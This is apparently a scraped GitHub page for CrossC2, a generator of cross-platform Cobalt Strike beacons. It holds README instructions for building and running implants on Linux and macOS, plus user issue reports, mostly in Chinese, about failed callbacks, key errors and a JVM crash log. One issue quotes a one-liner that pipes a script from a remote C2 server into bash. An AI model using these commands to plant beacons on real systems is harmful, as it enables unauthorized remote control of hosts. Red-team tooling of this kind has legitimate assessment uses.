gloxec / crossc2 Goto Github PK

View Code? Open in Web Editor NEW

2.1K 39.0 327.0 644.81 MB

generate CobaltStrike's cross-platform payload

Makefile 2.60% C 69.32% HTML 13.50% Python 14.16% Shell 0.41%

cobalt-strike linux macos android ios cross-platform redteam

crossc2's Introduction

CrossC2 framework

README | 中文文档 | README_FULL | 中文完整文档

CobaltStrike support

Support CobaltStrike's security assessment of other platforms (Linux/MacOS/...), and include the development support of Unix post-penetration module

	CS3.14(bug fixes)	CS4.0	CS4.X (4.1~4.8)
Master branch	✅
cs4.0 branch		✅
cs4.1 branch			✅

Release Page <= v2.1	✅
Release Page >= v2.2			✅

Usage

Download

Download CrossC2.cna genCrossC2 CrossC2Kit, modify CrossC2.cna configuration

Create listener and copy key

Create windows/beacon_https/reverse_https listener
Copy .cobaltstrike.beacon_keys in teamserver directory to local

Function extension

Add CrossC2Kit_Loader.cna, including memory loading and other functions
cs4.x version file management, process list function is missing, you must use this Loader to restart

Generate beacon

Use the GUI function provided by cli or cna to generate beacon by default

genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch>

ex:

1. read BEACON_KEY from current path and generate BEACON of default C2Profile traffic protocol
    genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out
     
2. specify the BEACON of the custom protocol dynamic library
    genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out

3. specify the C2Profile that needs to be automatically parsed
    genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out

more advanced configuration can be found in the documentation: 📄Reference

Run beacon

Run the one-click online script generated by the CrossC2 plugin on the target
After uploading the beacon to the target machine for empowered operation
Set the working directory for beacon and run: export CCPATH=/opt/ && /tmp/c2
Temporarily specify the protocol library for beacon and run: /tmp/c2 /tmp/c2-rebind.so
Temporarily set C2 configuration for beacon: export CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2
Set DEBUG to view the online status of beacon: export CCDEBUG=1 && /tmp/c2

CrossC2Kit

CrossC2Kit: https://github.com/CrossC2/CrossC2Kit

CrossC2Kit is an infiltration expansion around the Unix platform derived from CrossC2. Use Aggressor Script Open Source Script engine. It can be used to create automation to simulate the operation process of the Red Team and expand the CobaltStrike client.

CrossC2Kit is inherited from the original features of CobaltStrike, so the development and writing grammar still refer to the official documentation: https://trial.cobaltstrike.com/aggressor-script/index.html

But it has some API extensions on top of CrossC2 to control the beacon of the Unix platform

API: 📄Reference

Demo:

Note

Only for internal use by enterprises and organizations, this framework has a certain degree of instability. Non-professionals are not allowed to use it. Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.

Todo

http-proxy (auth) & socks proxy back connection support
node beacon? (Single node type, can host other beacon without relying on teamserver)
Linux & MacOS side so/dylib's reverse shell support, and its derivative process injection functions

Thank

Thanks to @Emma for the Logo designed for CrossC2, which is designed in the style of Armitage and CobaltStrike series

crossc2's People

Contributors

Stargazers

Watchers

Forkers

iiiusky bb33bb zer0yu qianniaoge xzvb12 ridter lzb960827 h1d3r lcccer vinhduong weidutech wule108 kaulanab saymehi restran kakakpy euphrat1ca 8gm houjinhoujin bigbrobro administratorgithub fdlucifer beyondljy zzwlpx lw1988 rookiebrother noone-hub lingade fishyyh webvul nnewkin phpplay ki11y0u mr-xn fzxcp3 lowliness9 bailongwang1 blankm1 hackdou ios1024 st-lucifer ir-st harry1080 douwanhu baisesecxxx jeperez functfan explore-c chrisjcox79 omiter j1nse minelost15 hatchetxuexi axax002 lucyboy1122334455 warren-jace fadinglr damingshidashi selfevo 5l1v3r1 sec-js hhhhelix gold1029 846910027 ydd1 wicusross hello-xbugs matteohu10 chenguoan11 w4nde3 ahrendsschmidt gysf666 ttuanhung glides miclejohn optionalg s0l3nya jasonlou dir-github weiwhy theth1nk3r changheluor007 fnsank raztyn wyrover test1213145 ohyessir mrawb xeyelab kaka77 fjxhkj morns0 lbcnp z99 collettcmd pafh99 mortals-tx thecryinggame cuteghost6 fakefake00

crossc2's Issues

linux 上线后使用 socks代理功能，并不能访问，这是为什么？

如题

use CrossC2.cna Version1.2 ，load error

When I use version 1.0，i can use it
but use version1.2 CrossC2.cna，load error

GenCross.cna

You forgot a semi-colon at line 37 of the .cna file at the end ;)

cs 4.1无法执行命令

能上线，无法执行命令

kali 5.3.0运行报错

hook大佬
在kali中直接命令行使用，命令如下：
./genCrossC2 172.16.39.212 8080 null null Linux x64 ./shell
运行后报错：

munmap_chunk(): invalid pointer
已放弃

生成payload错误

$ ./genCrossC2.Linux 127.0.0.1 4444 null null Linux x64 ./CrossC2-test

▄████▄ ██▀███ ▒█████ ██████ ██████ ▄████▄ ██████▄
▒██▀ ▀█ ▓██ ▒ ██▒▒██▒ ██▒▒██ ▒ ▒██ ▒ ▒██▀ ▀█ ██░
▒▓█ ▄ ▓██ ░▄█ ▒▒██░ ██▒░ ▓██▄ ░ ▓██▄ ▒▓█ █████▒
▒▓▓▄ ▄██▒▒██▀▀█▄ ▒██ ██░ ▒ ██▒ ▒ ██▒ ▒▓▓▄ ▄█ ░▒██
▒ ▓███▀ ░░██▓ ▒██▒░ ████▓▒░▒██████▒▒▒██████▒▒ ▒ ▓███▀ ░▒▓█████▓
░ ░▒ ▒ ░░ ▒▓ ░▒▓░░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░ ░ ░▒ ▒ ░▒ ░▓ ░░
░ ▒ ░▒ ░ ▒░ ░ ▒ ▒░ ░ ░▒ ░ ░░ ░▒ ░ ░ ░ ▒ ░ ░░ ░
░ ░░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ by:░hook
░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░

Exception in thread "main" java.lang.NoClassDefFoundError: common/CommonUtils
at genKey.BeaconKey.main(BeaconKey.java:52)
Caused by: java.lang.ClassNotFoundException: common.CommonUtils
at java.net.URLClassLoader.findClass(URLClassLoader.java:382)
at java.lang.ClassLoader.loadClass(ClassLoader.java:418)
at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:352)
at java.lang.ClassLoader.loadClass(ClassLoader.java:351)
... 1 more
*[error] : read key error

请问这个是怎么回事呢我已经把.cobaltstrike.beacon_keys拷贝到相应目录下了，还是报这个错误

ll
total 9396
drwxrwxr-x 3 yang yang 4096 4月 8 11:44 ./
drwxr-xr-x 44 yang yang 4096 1月 19 09:22 ../
-rwxrw-rw- 1 yang yang 1447 4月 8 11:33 .cobaltstrike.beacon_keys*
-rwxrw-rw- 1 yang yang 9603876 4月 7 20:05 genCrossC2.Linux*

请问Windows下genCrossC2.Win.exe发生错误

这是系统原因还是兼容问题，我的系统是2012.

CS 4.1分支在哪呀

cs 4.0版本命令执行无回显

4.0版本的cs，使用4.0分支的脚本，执行命令无回显。

低版本内核无法正常上线

以下为基本信息

内核版本：Linux 666 2.6.32 SMP Thu Feb 12 10:07:56 CST 2015 i686 i686 i386 GNU/Linux
正常出网

PING www.wshifen.com (103.235.46.39) 56(84) bytes of data.
64 bytes from 103.235.46.39: icmp_seq=1 ttl=55 time=31.8 ms
64 bytes from 103.235.46.39: icmp_seq=2 ttl=55 time=13.4 ms
64 bytes from 103.235.46.39: icmp_seq=3 ttl=55 time=13.6 ms
64 bytes from 103.235.46.39: icmp_seq=4 ttl=55 time=13.5 ms

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
115   230  115   230    0     0   3597      0 --:--:-- --:--:-- --:--:-- 10000

在最新版Kali Linux 可正常上线
也使用过“Linux-GLIBC”参数进行生成但依然无法上线，不知道有什么更好的版本，或做兼容性？

自定义通信协议能提供一份示例test.c文件吗

自己参照通信模板相关部分的说明编译的lib_rebind_test.so，并在profile文件中增加了相应调整的url，但是无法正常上线，希望师傅能提供一份完整的关于自定义通信模板的文件。谢谢

cs3.14 能上线但无法执行

3.13版本CS可以正常上线但无法执行命令

如题，CS版本为3.13，部署在云服务器上

按照文档修改了路径并拷贝了keys文件，生成了木马文件并运行，能够成功上线，但是上线后执行任何命令都收不到返回数据

目标靶机是无论是利用互联网上的服务器进行测试还是本地虚拟机测试都无法执行命令
请问是我哪里没有配置好还是其他原因导致的

Open source binaries

Is there a way to opensource also the binaries. Its not common to use closed coded binaries as noone knows what exactly they do and cannot be trusted.

Interesting work btw

执行命令没有回显示

请问作者，我机器上线后，执行命令没有回显是什么情况

使用GUI生成无法上线

[-] Beacon entry did not validate
internal address 'ssh-Linux' is not an address
[-] Session 842348593 -> Beacon @805908790, 0ms metadata validation failed. Dropping
[-] A Malleable C2 attempt to recover data from a '.http-get.client.metadata' transaction failed. This could be due to a bug in the profile, a change made to the profile after this Beacon was run, or a change made to the transaction by some device between your target and your Cobalt Strike controller. The following information will (hopefully) help narrow down what happened.

Sleep did not work

Hello i was testing this against linux and i typed sleep 5 but the listener kept going up to 1 min .
Also i executed shell commands or pwd and they didn't work. my system was the latest kali.

CS4.1 linux被判断成为windows主机，无法执行命令。

本地load cna无法在vps生成elf后门

师傅你好，我cs放在公网vps，从cs客户端本地load cna，改的cna中generator路径为本地windows exe的generator路径，在用cna生成payload的时候发现二阶payload内容为空，之后发现是因为elf后门没有生成在vps，更改output路径后可以在本地生成(但好像没什么用)，请问师傅我这操作是哪里有问题，我查了vps本地load cna，没找到能解决问题，还请师傅有空指导一下，感谢！
以下为cs控制台输出，genCrossC2 beacon位置为空
09/02 18:21:43 *** E:\Tool\CrossC2\genCrossC2.Win.exe vpsip 8080 E:\Tool\CrossC2.cobaltstrike.beacon_keys null Linux x64 /tmp/CrossC2-test
09/02 18:21:44 *** genCrossC2 beacon ->
09/02 18:21:44 *** admin hosted CrossC2 beacon Linux x64 @ http://vpsip:55413/ryVblkjFMr
09/02 18:21:44 *** CrossC2 Linux x64: curl -A o -o- -L http://vpsip:55413/a | bash -s

使用cs4.0 GUI生成的不能上线，使用的4.0分支

becan 文件管理，端口扫描都用不了，部分命令执行可以

ServerScan 等插件中文结果输出乱码

内存加载和调用 ServerScan 等插件，输出中文结果输出乱码，且输出内容已经强制指定为UTF-8编码。
Please更正环境变量。

genCrossC2 broken

[root@kali:src]# ./genCrossC2.Linux 127.0.0.1 4444 null null MacOS x64 ./CrossC2-test

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
read keys error
Exception in thread "main" java.lang.NoClassDefFoundError: common/CommonUtils
at genKey.BeaconKey.main(BeaconKey.java:52)
Caused by: java.lang.ClassNotFoundException: common.CommonUtils
at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:581)
at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:178)
at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
... 1 more
*[error] : read key error

teamserver无法与beacon正常通信

通常是没有正确配置c2profile的原因。

README 中有写增加http-get URI 以及提供了例子: src/c2profile.txt

未建立有效的Linstener, 目前只支持reverse-https

[ * ] 新版本已取消C2Profile的设定，可直接运行（下个版本一同推送）

执行报错

./genCrossC2.MacOS 127.0.0.1 4444 null null MacOS x64 ./CrossC2-test

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
read keys error
Exception in thread "main" java.lang.NoClassDefFoundError: common/CommonUtils
at genKey.BeaconKey.main(BeaconKey.java:52)
Caused by: java.lang.ClassNotFoundException: common.CommonUtils
at java.net.URLClassLoader.findClass(URLClassLoader.java:382)
at java.lang.ClassLoader.loadClass(ClassLoader.java:424)
at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:349)
at java.lang.ClassLoader.loadClass(ClassLoader.java:357)
... 1 more
*[error] : read key error

uploading large file

上传大文件时可能末尾字节写入不全

shell whoami 无回显

Linux centos-7.shared 3.10.0-862.11.6.el7.x86_64
能touch文件
sleep 0 需要多次才能顺利设置成功
shell whoami 无回显
可以帮忙看一下嘛 ,多谢啦🙏

linux主机上线后，不能进行任何操作

操作步骤如下：

使用的cobaltstrike按照文档要求版本为3.14
生成可执行文件在Kali Linux上运行，正常上线，客户端运行环境是Mac（图1）
Kali Linux上也查看到了进程（图2）
在客户端对Kali Linux主机进行文件操作后，Kali Linux主机就掉线了，在Kali Linux上查看进程发现，”CrossC2-test“进程也结束了（图3）
测试发现，只要对Kali Linux主机进行任何操作，比如文件操作、修改sleep时间、beacon等，都会导致主机下线。

问题总结：
排查了很久仍然没找到问题根源，实在没办法了

how do you reverse the beacon, by reverse the binary or Protocol?

read keys error

生成客户端时候出现key错误
generate beacon asymmetric keys error java.lang.NullPointerException at genKey.BeaconKey.main(BeaconKey.java:60)

加载插件选择rebind_dynamic_lib的时候闪退，并且自动生成错误日志

A fatal error has been detected by the Java Runtime Environment:

EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x0000000077c82887, pid=9044, tid=0x0000000000001614

JRE version: Java(TM) SE Runtime Environment (8.0_261-b12) (build 1.8.0_261-b12)

Java VM: Java HotSpot(TM) 64-Bit Server VM (25.261-b12 mixed mode windows-amd64 compressed oops)

Problematic frame:

C [ANSI64.dll+0x2887]

Failed to write core dump. Minidumps are not enabled by default on client versions of Windows

If you would like to submit a bug report, please visit:

http://bugreport.java.com/bugreport/crash.jsp

The crash happened outside the Java Virtual Machine in native code.

See problematic frame for where to report the bug.

--------------- T H R E A D ---------------

Current thread (0x000001b57cd48800): JavaThread "Swing-Shell" daemon [_thread_in_native, id=5652, stack(0x000000834ea00000,0x000000834eb00000)]

siginfo: ExceptionCode=0xc0000005, reading address 0x00007fff4b600024

Registers:
RAX=0x00007fff4b600000, RBX=0x0000000000000001, RCX=0x00007fff4b600024, RDX=0x0000000000000000
RSP=0x000000834eafa820, RBP=0x0000000000000000, RSI=0x0000000000000ebc, RDI=0x0000000077c8be80
R8 =0x000000834eafa7b8, R9 =0x0000000000000000, R10=0x0000000000000000, R11=0x0000000000000246
R12=0x0000000077c8bdb8, R13=0x0000000077c8e0e0, R14=0x000000834eafae38, R15=0x000000834eafadd0
RIP=0x0000000077c82887, EFLAGS=0x0000000000010246

Top of Stack: (sp=0x000000834eafa820)
0x000000834eafa820: 0000000000000001 000001b50ef50000
0x000000834eafa830: 0000000000000000 0000000000029000
0x000000834eafa840: 0000000000000000 000000834eafa9e8
0x000000834eafa850: 0000000100000438 0000000100002354
0x000000834eafa860: 0000000000000001 00007fff4b600000
0x000000834eafa870: 000000000005f000 00007fff4b600000
0x000000834eafa880: 004e004d00440049 006f004d00740065
0x000000834eafa890: 002e00340036006e 0000004c004c0044
0x000000834eafa8a0: 0000000000000000 0000000000000000
0x000000834eafa8b0: 0000000000000000 0000000000000000
0x000000834eafa8c0: 0000000000000000 0000000000000000
0x000000834eafa8d0: 0000000000000000 0000000000000000
0x000000834eafa8e0: 0000000000000000 0000000000000000
0x000000834eafa8f0: 0000000000000000 0000000000000000
0x000000834eafa900: 0000000000000000 0000000000000000
0x000000834eafa910: 0000000000000000 0000000000000000

Instructions: (pc=0x0000000077c82887)
0x0000000077c82867: 05 ac 05 01 00 0f 84 32 01 00 00 48 3b 05 97 f4
0x0000000077c82877: 00 00 0f 84 25 01 00 00 48 8d 48 24 85 ed 75 6a
0x0000000077c82887: 81 39 41 4e 53 49 75 37 f6 05 06 c2 00 00 10 0f
0x0000000077c82897: 84 08 01 00 00 48 8d 44 24 60 4c 8d 0d 00 95 00

RAX=0x00007fff4b600000 is an unknown value
RBX=0x0000000000000001 is an unknown value
RCX=0x00007fff4b600024 is an unknown value
RDX=0x0000000000000000 is an unknown value
RSP=0x000000834eafa820 is pointing into the stack for thread: 0x000001b57cd48800
RBP=0x0000000000000000 is an unknown value
RSI=0x0000000000000ebc is an unknown value
RDI=0x0000000077c8be80 is an unknown value
R8 =0x000000834eafa7b8 is pointing into the stack for thread: 0x000001b57cd48800
R9 =0x0000000000000000 is an unknown value
R10=0x0000000000000000 is an unknown value
R11=0x0000000000000246 is an unknown value
R12=0x0000000077c8bdb8 is an unknown value
R13=0x0000000077c8e0e0 is an unknown value
R14=0x000000834eafae38 is pointing into the stack for thread: 0x000001b57cd48800
R15=0x000000834eafadd0 is pointing into the stack for thread: 0x000001b57cd48800

Stack: [0x000000834ea00000,0x000000834eb00000], sp=0x000000834eafa820, free space=1002k
Native frames: (J=compiled Java code, j=interpreted, Vv=VM code, C=native code)

Java frames: (J=compiled Java code, j=interpreted, Vv=VM code)
j sun.awt.shell.Win32ShellFolder2.getIcon(Ljava/lang/String;Z)J+0
j sun.awt.shell.Win32ShellFolder2.access$2400(Ljava/lang/String;Z)J+2
j sun.awt.shell.Win32ShellFolder2$15.call()Ljava/awt/Image;+142
j sun.awt.shell.Win32ShellFolder2$15.call()Ljava/lang/Object;+1
J 6309 C1 java.util.concurrent.FutureTask.run()V (126 bytes) @ 0x000001b56a141b14 [0x000001b56a1418c0+0x254]
j java.util.concurrent.ThreadPoolExecutor.runWorker(Ljava/util/concurrent/ThreadPoolExecutor$Worker;)V+95
j java.util.concurrent.ThreadPoolExecutor$Worker.run()V+5
j sun.awt.shell.Win32ShellFolderManager2$ComInvoker$3.run()V+7
j java.lang.Thread.run()V+11
v ~StubRoutines::call_stub

--------------- P R O C E S S ---------------

Java Threads: ( => current thread )
0x000001b57cd4e000 JavaThread "Image Fetcher 0" daemon [_thread_blocked, id=10036, stack(0x000000834d500000,0x000000834d600000)]
=>0x000001b57cd48800 JavaThread "Swing-Shell" daemon [_thread_in_native, id=5652, stack(0x000000834ea00000,0x000000834eb00000)]
0x000001b57cd4d000 JavaThread "global timer" [_thread_blocked, id=12680, stack(0x000000834f800000,0x000000834f900000)]
0x000001b57cd48000 JavaThread "heartbeat thread" [_thread_blocked, id=7348, stack(0x000000834f600000,0x000000834f700000)]
0x000001b57cd49800 JavaThread "Global Data Manager" [_thread_blocked, id=13204, stack(0x000000834f500000,0x000000834f600000)]
0x000001b57cd4b800 JavaThread "Aggressor Script Event Queue" [_thread_blocked, id=4424, stack(0x000000834ed00000,0x000000834ee00000)]
0x000001b57cd4b000 JavaThread "TeamQueue Reader" [_thread_in_native, id=12340, stack(0x000000834f300000,0x000000834f400000)]
0x000001b57cd3e800 JavaThread "TeamQueue Writer" [_thread_blocked, id=3856, stack(0x000000834f200000,0x000000834f300000)]
0x000001b57dd43000 JavaThread "TimerQueue" daemon [_thread_blocked, id=12356, stack(0x000000834f100000,0x000000834f200000)]
0x000001b566cd0800 JavaThread "DestroyJavaVM" [_thread_blocked, id=2828, stack(0x000000834d700000,0x000000834d800000)]
0x000001b57cb43000 JavaThread "AWT-EventQueue-0" [_thread_blocked, id=7576, stack(0x000000834ec00000,0x000000834ed00000)]
0x000001b57c929000 JavaThread "SyntheticaCleanerThread" daemon [_thread_blocked, id=4880, stack(0x000000834eb00000,0x000000834ec00000)]
0x000001b57beb6800 JavaThread "AWT-Windows" daemon [_thread_in_native, id=13220, stack(0x000000834e900000,0x000000834ea00000)]
0x000001b57beb5800 JavaThread "AWT-Shutdown" [_thread_blocked, id=8660, stack(0x000000834e800000,0x000000834e900000)]
0x000001b57beb3000 JavaThread "Java2D Disposer" daemon [_thread_blocked, id=3564, stack(0x000000834e700000,0x000000834e800000)]
0x000001b57b178000 JavaThread "Service Thread" daemon [_thread_blocked, id=892, stack(0x000000834e500000,0x000000834e600000)]
0x000001b57b0e5000 JavaThread "C1 CompilerThread3" daemon [_thread_blocked, id=10276, stack(0x000000834e400000,0x000000834e500000)]
0x000001b57b0e2800 JavaThread "C2 CompilerThread2" daemon [_thread_blocked, id=11544, stack(0x000000834e300000,0x000000834e400000)]
0x000001b57b0e0000 JavaThread "C2 CompilerThread1" daemon [_thread_blocked, id=11588, stack(0x000000834e200000,0x000000834e300000)]
0x000001b57b0dc000 JavaThread "C2 CompilerThread0" daemon [_thread_blocked, id=7208, stack(0x000000834e100000,0x000000834e200000)]
0x000001b57b087800 JavaThread "Attach Listener" daemon [_thread_blocked, id=10648, stack(0x000000834e000000,0x000000834e100000)]
0x000001b57b086000 JavaThread "Signal Dispatcher" daemon [_thread_blocked, id=6652, stack(0x000000834df00000,0x000000834e000000)]
0x000001b57b060000 JavaThread "Finalizer" daemon [_thread_blocked, id=9404, stack(0x000000834de00000,0x000000834df00000)]
0x000001b57b036000 JavaThread "Reference Handler" daemon [_thread_blocked, id=11952, stack(0x000000834dd00000,0x000000834de00000)]

Other Threads:
0x000001b568d1d800 VMThread [stack: 0x000000834dc00000,0x000000834dd00000] [id=8000]
0x000001b57bb3c800 WatcherThread [stack: 0x000000834e600000,0x000000834e700000] [id=8532]

VM state:not at safepoint (normal execution)

VM Mutex/Monitor currently owned by a thread: None

heap address: 0x0000000642c00000, size: 6100 MB, Compressed Oops mode: Zero based, Oop shift amount: 3
Narrow klass base: 0x0000000000000000, Narrow klass shift: 3
Compressed class space size: 1073741824 Address: 0x00000007c0000000

Heap:
PSYoungGen total 2050048K, used 31720K [0x0000000731200000, 0x00000007c0000000, 0x00000007c0000000)
eden space 1759232K, 1% used [0x0000000731200000,0x00000007330fa118,0x000000079c800000)
from space 290816K, 0% used [0x00000007ae400000,0x00000007ae400000,0x00000007c0000000)
to space 290816K, 0% used [0x000000079c800000,0x000000079c800000,0x00000007ae400000)
ParOldGen total 3905536K, used 28770K [0x0000000642c00000, 0x0000000731200000, 0x0000000731200000)
object space 3905536K, 0% used [0x0000000642c00000,0x0000000644818b10,0x0000000731200000)
Metaspace used 30913K, capacity 31328K, committed 31664K, reserved 1077248K
class space used 3849K, capacity 3994K, committed 4016K, reserved 1048576K

Card table byte_map: [0x000001b5781c0000,0x000001b578db0000] byte_map_base: 0x000001b574faa000

Marking Bits: (ParMarkBitMap*) 0x0000000077074fb0
Begin Bits: [0x000001b500000000, 0x000001b505f50000)
End Bits: [0x000001b505f50000, 0x000001b50bea0000)

Polling page: 0x000001b566ed0000

CodeCache: size=245760Kb used=19713Kb max_used=19725Kb free=226046Kb
bounds [0x000001b568e00000, 0x000001b56a170000, 0x000001b577e00000]
total_blobs=5969 nmethods=5295 adapters=583
compilation: enabled

Compilation events (10 events):
Event: 3573.076 Thread 0x000001b57b0e0000 nmethod 6387 0x000001b569af0cd0 code [0x000001b569af0e40, 0x000001b569af1558]
Event: 3573.078 Thread 0x000001b57b0e5000 6392 3 java.awt.Container::adjustListeningChildren (108 bytes)
Event: 3573.078 Thread 0x000001b57b0e5000 nmethod 6392 0x000001b569af2790 code [0x000001b569af2940, 0x000001b569af2f90]
Event: 3573.079 Thread 0x000001b57b0dc000 6393 4 java.lang.String::toLowerCase (439 bytes)
Event: 3573.079 Thread 0x000001b57b0e5000 6394 3 javax.swing.DefaultListCellRenderer::revalidate (1 bytes)
Event: 3573.079 Thread 0x000001b57b0e5000 nmethod 6394 0x000001b5698da310 code [0x000001b5698da460, 0x000001b5698da5b8]
Event: 3573.079 Thread 0x000001b57b0e5000 6395 3 sun.awt.shell.Win32ShellFolder2::access$700 (8 bytes)
Event: 3573.079 Thread 0x000001b57b0e5000 nmethod 6395 0x000001b569aefe50 code [0x000001b569aeffc0, 0x000001b569af0130]
Event: 3573.083 Thread 0x000001b57b0e2800 nmethod 6346 0x000001b56a15ba90 code [0x000001b56a15bec0, 0x000001b56a15dc70]
Event: 3573.086 Thread 0x000001b57b0dc000 nmethod 6393 0x000001b56a15ed50 code [0x000001b56a15ef00, 0x000001b56a15f778]

GC Heap History (10 events):
Event: 3281.457 GC heap before
{Heap before GC invocations=15 (full 15):
PSYoungGen total 2050048K, used 768K [0x0000000731200000, 0x00000007c0000000, 0x00000007c0000000)
eden space 1759232K, 0% used [0x0000000731200000,0x00000007312c0038,0x000000079c800000)
from space 290816K, 0% used [0x00000007ae400000,0x00000007ae400000,0x00000007c0000000)
to space 290816K, 0% used [0x000000079c800000,0x000000079c800000,0x00000007ae400000)
ParOldGen total 3905536K, used 28814K [0x0000000642c00000, 0x0000000731200000, 0x0000000731200000)
object space 3905536K, 0% used [0x0000000642c00000,0x0000000644823af8,0x0000000731200000)
Metaspace used 29740K, capacity 30138K, committed 30512K, reserved 1075200K
class space used 3690K, capacity 3831K, committed 3888K, reserved 1048576K
Event: 3281.479 GC heap after
Heap after GC invocations=15 (full 15):
PSYoungGen total 2050048K, used 0K [0x0000000731200000, 0x00000007c0000000, 0x00000007c0000000)
eden space 1759232K, 0% used [0x0000000731200000,0x0000000731200000,0x000000079c800000)
from space 290816K, 0% used [0x00000007ae400000,0x00000007ae400000,0x00000007c0000000)
to space 290816K, 0% used [0x000000079c800000,0x000000079c800000,0x00000007ae400000)
ParOldGen total 3905536K, used 28823K [0x0000000642c00000, 0x0000000731200000, 0x0000000731200000)
object space 3905536K, 0% used [0x0000000642c00000,0x0000000644825f50,0x0000000731200000)
Metaspace used 29740K, capacity 30138K, committed 30512K, reserved 1075200K
class space used 3690K, capacity 3831K, committed 3888K, reserved 1048576K
}
Event: 3281.984 GC heap before
{Heap before GC invocations=16 (full 16):
PSYoungGen total 2050048K, used 1792K [0x0000000731200000, 0x00000007c0000000, 0x00000007c0000000)
eden space 1759232K, 0% used [0x0000000731200000,0x00000007313c00f8,0x000000079c800000)
from space 290816K, 0% used [0x00000007ae400000,0x00000007ae400000,0x00000007c0000000)
to space 290816K, 0% used [0x000000079c800000,0x000000079c800000,0x00000007ae400000)
ParOldGen total 3905536K, used 28823K [0x0000000642c00000, 0x0000000731200000, 0x0000000731200000)
object space 3905536K, 0% used [0x0000000642c00000,0x0000000644825f50,0x0000000731200000)
Metaspace used 29749K, capacity 30138K, committed 30512K, reserved 1075200K
class space used 3690K, capacity 3831K, committed 3888K, reserved 1048576K
Event: 3282.013 GC heap after
Heap after GC invocations=16 (full 16):
PSYoungGen total 2050048K, used 0K [0x0000000731200000, 0x00000007c0000000, 0x00000007c0000000)
eden space 1759232K, 0% used [0x0000000731200000,0x0000000731200000,0x000000079c800000)
from space 290816K, 0% used [0x00000007ae400000,0x00000007ae400000,0x00000007c0000000)
to space 290816K, 0% used [0x000000079c800000,0x000000079c800000,0x00000007ae400000)
ParOldGen total 3905536K, used 28769K [0x0000000642c00000, 0x0000000731200000, 0x0000000731200000)
object space 3905536K, 0% used [0x0000000642c00000,0x00000006448187b8,0x0000000731200000)
Metaspace used 29749K, capacity 30138K, committed 30512K, reserved 1075200K
class space used 3690K, capacity 3831K, committed 3888K, reserved 1048576K
}
Event: 3282.021 GC heap before
{Heap before GC invocations=17 (full 17):
PSYoungGen total 2050048K, used 768K [0x0000000731200000, 0x00000007c0000000, 0x00000007c0000000)
eden space 1759232K, 0% used [0x0000000731200000,0x00000007312c0070,0x000000079c800000)
from space 290816K, 0% used [0x00000007ae400000,0x00000007ae400000,0x00000007c0000000)
to space 290816K, 0% used [0x000000079c800000,0x000000079c800000,0x00000007ae400000)
ParOldGen total 3905536K, used 28769K [0x0000000642c00000, 0x0000000731200000, 0x0000000731200000)
object space 3905536K, 0% used [0x0000000642c00000,0x00000006448187b8,0x0000000731200000)
Metaspace used 29751K, capacity 30138K, committed 30512K, reserved 1075200K
class space used 3690K, capacity 3831K, committed 3888K, reserved 1048576K
Event: 3282.045 GC heap after
Heap after GC invocations=17 (full 17):
PSYoungGen total 2050048K, used 0K [0x0000000731200000, 0x00000007c0000000, 0x00000007c0000000)
eden space 1759232K, 0% used [0x0000000731200000,0x0000000731200000,0x000000079c800000)
from space 290816K, 0% used [0x00000007ae400000,0x00000007ae400000,0x00000007c0000000)
to space 290816K, 0% used [0x000000079c800000,0x000000079c800000,0x00000007ae400000)
ParOldGen total 3905536K, used 28759K [0x0000000642c00000, 0x0000000731200000, 0x0000000731200000)
object space 3905536K, 0% used [0x0000000642c00000,0x0000000644815d90,0x0000000731200000)
Metaspace used 29751K, capacity 30138K, committed 30512K, reserved 1075200K
class space used 3690K, capacity 3831K, committed 3888K, reserved 1048576K
}
Event: 3282.857 GC heap before
{Heap before GC invocations=18 (full 18):
PSYoungGen total 2050048K, used 1792K [0x0000000731200000, 0x00000007c0000000, 0x00000007c0000000)
eden space 1759232K, 0% used [0x0000000731200000,0x00000007313c01a8,0x000000079c800000)
from space 290816K, 0% used [0x00000007ae400000,0x00000007ae400000,0x00000007c0000000)
to space 290816K, 0% used [0x000000079c800000,0x000000079c800000,0x00000007ae400000)
ParOldGen total 3905536K, used 28759K [0x0000000642c00000, 0x0000000731200000, 0x0000000731200000)
object space 3905536K, 0% used [0x0000000642c00000,0x0000000644815d90,0x0000000731200000)
Metaspace used 29752K, capacity 30138K, committed 30512K, reserved 1075200K
class space used 3690K, capacity 3831K, committed 3888K, reserved 1048576K
Event: 3282.883 GC heap after
Heap after GC invocations=18 (full 18):
PSYoungGen total 2050048K, used 0K [0x0000000731200000, 0x00000007c0000000, 0x00000007c0000000)
eden space 1759232K, 0% used [0x0000000731200000,0x0000000731200000,0x000000079c800000)
from space 290816K, 0% used [0x00000007ae400000,0x00000007ae400000,0x00000007c0000000)
to space 290816K, 0% used [0x000000079c800000,0x000000079c800000,0x00000007ae400000)
ParOldGen total 3905536K, used 28760K [0x0000000642c00000, 0x0000000731200000, 0x0000000731200000)
object space 3905536K, 0% used [0x0000000642c00000,0x0000000644816028,0x0000000731200000)
Metaspace used 29752K, capacity 30138K, committed 30512K, reserved 1075200K
